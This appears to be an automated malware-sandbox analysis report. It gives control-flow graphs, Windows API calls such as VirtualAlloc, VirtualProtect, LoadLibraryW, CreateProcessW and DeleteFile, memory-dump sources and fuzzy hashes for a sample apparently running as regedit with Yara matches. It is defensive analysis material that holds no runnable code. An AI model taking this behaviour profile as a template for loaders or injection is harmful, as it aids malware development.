                                                                                      control_flow_graph 328 21b3a20-21b3a3b 329 21b3a40-21b3a45 328->329 330 21b3a4b 329->330 331 21b3bce-21b3bd3 329->331 334 21b3b8f-21b3b96 330->334 335 21b3a51-21b3a56 330->335 332 21b3bfc-21b3c0f call 21b35f0 331->332 333 21b3bd5-21b3bda 331->333 355 21b3c2c-21b3c47 332->355 356 21b3c11-21b3c27 call 21b4190 call 21b40f0 332->356 338 21b3bdc-21b3be1 333->338 339 21b3be6-21b3beb 333->339 336 21b3b98-21b3bae call 21b4190 call 21b40f0 334->336 337 21b3bb3-21b3bc9 FindNextFileW 334->337 341 21b3a5c-21b3a61 335->341 342 21b3ca0-21b3ca7 335->342 336->337 337->329 338->329 339->329 346 21b3bf1-21b3bfb 339->346 348 21b3b47-21b3b4e 341->348 349 21b3a67-21b3a6c 341->349 344 21b3ca9-21b3cbf call 21b4190 call 21b40f0 342->344 345 21b3cc4-21b3cc5 FindClose 342->345 344->345 354 21b3cc7-21b3cd1 345->354 352 21b3b6b-21b3b7f FindFirstFileW 348->352 353 21b3b50-21b3b66 call 21b4190 call 21b40f0 348->353 349->339 357 21b3a72-21b3a77 349->357 352->354 361 21b3b85-21b3b8a 352->361 353->352 376 21b3c49-21b3c5f call 21b4190 call 21b40f0 355->376 377 21b3c64-21b3c6f 355->377 356->355 363 21b3a7d-21b3a83 357->363 364 21b3b21-21b3b42 357->364 361->329 366 21b3a85-21b3a8d 363->366 367 21b3aa4-21b3aa6 363->367 364->329 373 21b3a8f-21b3a93 366->373 374 21b3a9d-21b3aa2 366->374 367->374 375 21b3aa8-21b3abb call 21b35f0 367->375 373->367 382 21b3a95-21b3a9b 373->382 374->329 389 21b3ad8-21b3b08 call 21b3a20 375->389 390 21b3abd-21b3ad3 call 21b4190 call 21b40f0 375->390 376->377 392 21b3c8c-21b3c9b 377->392 393 21b3c71-21b3c87 call 21b4190 call 21b40f0 377->393 382->367 382->374 404 21b3b0d-21b3b1c call 21b3590 389->404 390->389 392->329 393->392 404->329
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 021B3B78
                                                                                      • FindNextFileW.KERNELBASE(?,?), ref: 021B3BB9
                                                                                      • FindClose.KERNELBASE(?), ref: 021B3CC5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1322373634.00000000021B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322408538.00000000021BD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.00000000021C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.0000000002203000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_21b0000_regedit.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID: .$HUE($HUE($12
                                                                                      • API String ID: 3541575487-884143723
                                                                                      • Opcode ID: 1ae9f58a8a03f7b2906a05351232a2ecfa22cd9c29d2913861a1fb192ebeb18b
                                                                                      • Instruction ID: abc909cc0f018ea368f004823d382ead05fd7e1d10ee8dfb29a44f966a66da11
                                                                                      • Opcode Fuzzy Hash: 1ae9f58a8a03f7b2906a05351232a2ecfa22cd9c29d2913861a1fb192ebeb18b
                                                                                      • Instruction Fuzzy Hash: FC511A31BC42014BCB2BFAB8A954BFB76F69F91200F104D6DF565C7241EB36C8658B92

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 409 21b86f0-21b8806 410 21b8810-21b8816 409->410 411 21b881c 410->411 412 21b8950-21b8956 410->412 415 21b891b-21b8922 411->415 416 21b8822-21b8828 411->416 413 21b8958-21b895e 412->413 414 21b89a0-21b89e8 call 21bbaa0 412->414 417 21b88ac-21b88b2 413->417 418 21b8964-21b896b 413->418 432 21b88b8-21b88c2 414->432 440 21b89ee 414->440 419 21b893f-21b894b 415->419 420 21b8924-21b893a call 21b4190 call 21b40f0 415->420 421 21b882e-21b8834 416->421 422 21b88c3-21b88cb 416->422 417->410 417->432 426 21b8988-21b899b 418->426 427 21b896d-21b8983 call 21b4190 call 21b40f0 418->427 419->410 420->419 429 21b8836-21b883c 421->429 430 21b8845-21b884c 421->430 424 21b88eb-21b890f CreateFileW 422->424 425 21b88cd-21b88e5 call 21b4190 call 21b40f0 422->425 424->432 435 21b8911-21b8916 424->435 425->424 426->410 427->426 429->417 437 21b883e-21b8843 429->437 438 21b8869-21b888c 430->438 439 21b884e-21b8864 call 21b4190 call 21b40f0 430->439 435->410 437->410 456 21b88a9 438->456 457 21b888e-21b88a4 call 21b4190 call 21b40f0 438->457 439->438 447 21b89f8-21b8a05 440->447 448 21b89f0-21b89f2 440->448 448->432 448->447 456->417 457->456
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000), ref: 021B8908
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1322373634.00000000021B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322408538.00000000021BD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.00000000021C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.0000000002203000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_21b0000_regedit.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID: [i$V^!$x*
                                                                                      • API String ID: 823142352-1411442858
                                                                                      • Opcode ID: 6d64c3bfa24e0060e2e916f9898e37f64be72e527f063f4de237b0b4e56bafea
                                                                                      • Instruction ID: a1c3916c89cc5c6ccee02d5e4a936539bb8446b50984e79b0b14ec7789aa70d6
                                                                                      • Opcode Fuzzy Hash: 6d64c3bfa24e0060e2e916f9898e37f64be72e527f063f4de237b0b4e56bafea
                                                                                      • Instruction Fuzzy Hash: B871C071A883019FD709EE29D8586AFBBF5AFC4714F018D2CE4A997290D774D909CF82

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 51 401019-4012fe 53 4014d1-4014db 51->53 54 401304-40131a 51->54 55 401320-4014b2 call 401560 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z * 2 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z * 2 ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z 54->55 58 4014b8-4014d0 55->58
                                                                                      APIs
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4,00000343,02042508), ref: 00401398
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 0040139B
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 004013AC
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 004013AF
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 004013C1
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 004013C4
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,6EA4A3D8,004059A4), ref: 004013D9
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 004013EA
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 004013F0
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 00401402
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 00401405
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,6EA4A3D8,004059A4), ref: 0040141A
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 0040142B
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 0040142E
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 00401440
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 00401443
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 00401455
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 00401458
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 0040146C
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 0040146F
                                                                                      • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6EA4A3D8,004059A4), ref: 00401481
                                                                                      • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000), ref: 00401484
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1321303843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1321284705.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321339220.0000000000405000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321369799.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1321369799.0000000000474000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_regedit.jbxd
                                                                                      Similarity
                                                                                      • API ID: U?$char_traits@V?$basic_ostream@$?endl@std@@D@std@@@1@V21@@$??6std@@D@std@@@0@V10@
                                                                                      • String ID:
                                                                                      • API String ID: 2803004057-0
                                                                                      • Opcode ID: 4e668faee3baf0bf314fe0a6ed89ed04cc46d060bfd11fc77c33a5f615d1b13b
                                                                                      • Instruction ID: e5c193a8be6e18b913c016f231c9b957fb8706e5e71893854bd9b99652add971
                                                                                      • Opcode Fuzzy Hash: 4e668faee3baf0bf314fe0a6ed89ed04cc46d060bfd11fc77c33a5f615d1b13b
                                                                                      • Instruction Fuzzy Hash: 0E51F3796053919FC700EB74DD8882B7FA9EF88314F0548EDF845A73D1C6799418CBAA

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 464 21b31f0-21b3206 465 21b320a-21b320f 464->465 466 21b3210-21b3215 465->466 467 21b321b 466->467 468 21b333d-21b3342 466->468 469 21b321d-21b3222 467->469 470 21b3294-21b3338 467->470 471 21b337d-21b3384 468->471 472 21b3344-21b3349 468->472 477 21b325a-21b3262 469->477 478 21b3224-21b3229 469->478 470->465 475 21b33a1-21b33ac 471->475 476 21b3386-21b339c call 21b4190 call 21b40f0 471->476 473 21b334b-21b3350 472->473 474 21b3369-21b336d 472->474 479 21b3236-21b323b 473->479 480 21b3356-21b3364 473->480 481 21b342b-21b3435 474->481 482 21b3373-21b3378 474->482 500 21b33c9-21b33d7 RtlAllocateHeap 475->500 501 21b33ae-21b33c4 call 21b4190 call 21b40f0 475->501 476->475 483 21b3282-21b328f 477->483 484 21b3264-21b327c call 21b4190 call 21b40f0 477->484 486 21b322b-21b3230 478->486 487 21b324a-21b3258 call 21b3ee0 478->487 479->466 488 21b323d-21b3247 479->488 480->466 482->466 483->465 484->483 486->479 493 21b33e3-21b33eb 486->493 487->465 495 21b340b-21b3429 493->495 496 21b33ed-21b3405 call 21b4190 call 21b40f0 493->496 495->481 496->495 500->481 502 21b33d9-21b33de 500->502 501->500 502->465
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,00000008,0000021C), ref: 021B33D1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1322373634.00000000021B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322408538.00000000021BD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.00000000021C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.0000000002203000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_21b0000_regedit.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID: V<j[$p^sw$12
                                                                                      • API String ID: 1279760036-1938916030
                                                                                      • Opcode ID: 6cf95f13906b4579c286bf66353f6bfec094916cf2b2aed564709f9653e54b60
                                                                                      • Instruction ID: e05b87bb6750d4e5d6e3018f7a7caacaf51db17037c57cb8ac003c189a4cb9c9
                                                                                      • Opcode Fuzzy Hash: 6cf95f13906b4579c286bf66353f6bfec094916cf2b2aed564709f9653e54b60
                                                                                      • Instruction Fuzzy Hash: 36512775A843018FC719DE2894945AFBBF2EFD4240F108CAEE461C7391DB71D96ACB82

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 598 1fd002d-1fd009e call 1fd0456 * 6 611 1fd00a7-1fd00b0 598->611 612 1fd00a0-1fd00a2 598->612 611->612 614 1fd00b2-1fd00b6 611->614 613 1fd044e-1fd0455 612->613 614->612 615 1fd00b8-1fd00c2 614->615 616 1fd00e4-1fd0105 GetNativeSystemInfo 615->616 617 1fd00c4-1fd00c7 615->617 616->612 618 1fd0107-1fd012d VirtualAlloc 616->618 619 1fd00c9-1fd00cf 617->619 620 1fd012f-1fd0133 618->620 621 1fd0162-1fd016c 618->621 622 1fd00d6 619->622 623 1fd00d1-1fd00d4 619->623 625 1fd0135-1fd0138 620->625 626 1fd016e-1fd0173 621->626 627 1fd01a4-1fd01b5 621->627 624 1fd00d9-1fd00e2 622->624 623->624 624->616 624->619 630 1fd013a-1fd0142 625->630 631 1fd0153-1fd0155 625->631 632 1fd0177-1fd018a 626->632 628 1fd0234-1fd0240 627->628 629 1fd01b7-1fd01d1 627->629 635 1fd0246-1fd025d 628->635 636 1fd02f0-1fd02fa 628->636 651 1fd01d3 629->651 652 1fd0222-1fd022e 629->652 630->631 637 1fd0144-1fd0147 630->637 638 1fd0157-1fd015c 631->638 633 1fd018c-1fd0193 632->633 634 1fd0199-1fd019e 632->634 633->633 639 1fd0195 633->639 634->632 642 1fd01a0 634->642 635->636 643 1fd0263-1fd0273 635->643 640 1fd0300-1fd0307 636->640 641 1fd03b2-1fd03c7 call 21527b0 636->641 645 1fd014e-1fd0151 637->645 646 1fd0149-1fd014c 637->646 638->625 647 1fd015e 638->647 639->634 648 1fd0309-1fd0312 640->648 673 1fd03c9-1fd03ce 641->673 642->627 649 1fd02d5-1fd02e6 643->649 650 1fd0275-1fd0279 643->650 645->638 646->631 646->645 647->621 655 1fd0318-1fd0333 648->655 656 1fd03a7-1fd03ac 648->656 649->643 653 1fd02ec 649->653 657 1fd027a-1fd0289 650->657 658 1fd01d7-1fd01db 651->658 652->629 654 1fd0230 652->654 653->636 654->628 660 1fd034d-1fd034f 655->660 661 1fd0335-1fd0337 655->661 656->641 656->648 662 1fd028b-1fd028f 657->662 663 1fd0291-1fd029a 657->663 664 1fd01dd 658->664 665 1fd01fb-1fd0204 658->665 670 1fd0368-1fd036a 660->670 671 1fd0351-1fd0353 660->671 666 1fd0339-1fd033e 661->666 667 1fd0340-1fd0343 661->667 662->663 668 1fd029c-1fd02a1 662->668 669 1fd02c3-1fd02c7 663->669 664->665 672 1fd01df-1fd01f9 664->672 681 1fd0207-1fd021c 665->681 676 1fd0345-1fd034b 666->676 667->676 677 1fd02b4-1fd02b7 668->677 678 1fd02a3-1fd02b2 668->678 669->657 684 1fd02c9-1fd02d1 669->684 674 1fd036c 670->674 675 1fd0371-1fd0376 670->675 679 1fd0359-1fd035b 671->679 680 1fd0355-1fd0357 671->680 672->681 682 1fd044c 673->682 683 1fd03d0-1fd03d4 673->683 685 1fd036e-1fd036f 674->685 686 1fd0379-1fd0380 675->686 676->686 677->669 687 1fd02b9-1fd02bf 677->687 678->669 679->670 688 1fd035d-1fd035f 679->688 680->685 681->658 690 1fd021e 681->690 682->613 683->682 689 1fd03d6-1fd03e0 683->689 684->649 685->686 691 1fd0388-1fd039d VirtualProtect 686->691 692 1fd0382 686->692 687->669 688->686 693 1fd0361-1fd0366 688->693 689->682 694 1fd03e2-1fd03e6 689->694 690->652 691->612 696 1fd03a3 691->696 692->691 693->686 694->682 695 1fd03e8-1fd03f9 694->695 695->682 697 1fd03fb-1fd0400 695->697 696->656 698 1fd0402-1fd040f 697->698 698->698 699 1fd0411-1fd0415 698->699 700 1fd042d-1fd0433 699->700 701 1fd0417-1fd0429 699->701 700->682 703 1fd0435-1fd044b 700->703 701->697 702 1fd042b 701->702 702->682 703->682
                                                                                      APIs
                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,01FD0005), ref: 01FD00E9
                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,01FD0005), ref: 01FD0111
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322151004.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1fd0000_regedit.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocInfoNativeSystemVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 2032221330-0
                                                                                      • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                                      • Instruction ID: 2bdd85d2618c85df02c5e6af34a5c100c6a39c69f978da67e16c943c8f6b9570
                                                                                      • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                                      • Instruction Fuzzy Hash: 61D19B71A04306DBE714CF69C88477AB7E2BF84318F18852DF9958B242EB76E845CB91

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 706 21b73c0-21b73c7 707 21b73d0-21b73d5 706->707 708 21b73db 707->708 709 21b74e1-21b74e6 707->709 710 21b7449-21b745c call 21b35f0 708->710 711 21b73dd-21b73e2 708->711 712 21b752a-21b752f 709->712 713 21b74e8 709->713 734 21b7479-21b748c LoadLibraryW 710->734 735 21b745e-21b7474 call 21b4190 call 21b40f0 710->735 716 21b7437-21b743c 711->716 717 21b73e4 711->717 719 21b754a-21b754f 712->719 720 21b7531-21b7545 call 21b7320 712->720 714 21b74ea-21b74ef 713->714 715 21b7558-21b7563 713->715 721 21b7511-21b7525 call 21b7320 714->721 722 21b74f1-21b74f6 714->722 716->719 723 21b7442-21b7447 716->723 724 21b7421-21b7435 call 21b7320 717->724 725 21b73e6-21b73eb 717->725 719->707 728 21b7555-21b7557 719->728 720->707 721->707 722->719 730 21b74f8-21b750c call 21b7320 722->730 723->707 724->707 731 21b740b-21b741f call 21b7320 725->731 732 21b73ed-21b73f2 725->732 730->707 731->707 732->719 739 21b73f8-21b7409 call 21b7320 732->739 743 21b74a9-21b74b4 734->743 744 21b748e-21b74a4 call 21b4190 call 21b40f0 734->744 735->734 739->707 755 21b74d1-21b74dc 743->755 756 21b74b6-21b74cc call 21b4190 call 21b40f0 743->756 744->743 755->707 756->755
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,38CFF007,021B6F11), ref: 021B747A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1322373634.00000000021B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322408538.00000000021BD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.00000000021C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.0000000002203000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_21b0000_regedit.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: 12
                                                                                      • API String ID: 1029625771-2589614596
                                                                                      • Opcode ID: b8d4251b7739b5a2e970ed218c6015da070bef7630a0aeafaaa3e494c194d858
                                                                                      • Instruction ID: 09347536af9a8cfeaf37b67138aa2f4aa1f891a8e6c5ac13ec90980fed14f7cf
                                                                                      • Opcode Fuzzy Hash: b8d4251b7739b5a2e970ed218c6015da070bef7630a0aeafaaa3e494c194d858
                                                                                      • Instruction Fuzzy Hash: 01316326BC41048BDA2F657978A03FBD6B39FC1611F51487AE902CB3D5EB65C843CB92

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 021B4F41
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1322373634.00000000021B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322408538.00000000021BD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.00000000021C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.0000000002203000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_21b0000_regedit.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID: D
                                                                                      • API String ID: 963392458-2746444292
                                                                                      • Opcode ID: d7aefdbd9d9850eb07bf67988251c834fef13713bbbceb103c76d92e8b661676
                                                                                      • Instruction ID: df195f1c3cfdbbbf38c3f6d20a9017d2d19cf1bbd0d69156bcab21a0fbcd8d0e
                                                                                      • Opcode Fuzzy Hash: d7aefdbd9d9850eb07bf67988251c834fef13713bbbceb103c76d92e8b661676
                                                                                      • Instruction Fuzzy Hash: 88219135B842415FE716AB7CAC64BEB3BF69FC0600F50892CF944CB282EB74D8558B91

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1322373634.00000000021B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322408538.00000000021BD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.00000000021C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.0000000002203000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_21b0000_regedit.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID: 12
                                                                                      • API String ID: 4033686569-2589614596
                                                                                      • Opcode ID: 46500da407e91f57304f1b3632c3df120b215d8cb61ba8495de67896d0797bad
                                                                                      • Instruction ID: 5e57cc7a39167a87ee18944509741a1d64d9068d82156a9bf09833232baec153
                                                                                      • Opcode Fuzzy Hash: 46500da407e91f57304f1b3632c3df120b215d8cb61ba8495de67896d0797bad
                                                                                      • Instruction Fuzzy Hash: E1113370FC42014FDB1AB679A920BEB2AF69F85340B40497CE955CB282EF75D8218B91

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,38CFF007,021B7540,?,38CFF007,021B6F11), ref: 021B7350
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.1322373634.00000000021B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322408538.00000000021BD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.00000000021C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.1322425692.0000000002203000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_21b0000_regedit.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: 12
                                                                                      • API String ID: 1029625771-2589614596
                                                                                      • Opcode ID: 496a576e3d8d6d6d0629f781d878b72880eeffeb0ec1347dfbd9601a2295da76
                                                                                      • Instruction ID: a630575af3c3a9e8cf2bca69ada5e854836b39e8acd8edd30502684c0951c5c9
                                                                                      • Opcode Fuzzy Hash: 496a576e3d8d6d6d0629f781d878b72880eeffeb0ec1347dfbd9601a2295da76
                                                                                      • Instruction Fuzzy Hash: 73014474BC42014FCB1ABB7978607AF6AF69FC12103008878E815CB381EB35D8528F91

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 849 21b6060-21b606c call 21b6860 852 21b6089-21b608d ExitProcess 849->852 853 21b606e-21b6084 call 21b4190 call 21b40f0 849->853 853->852
                                                                                      APIs
                                                                                      • ExitProcess.KERNEL32(00000000), ref: 021B608B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1322392048.00000000021B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021B0000, based on PE: true
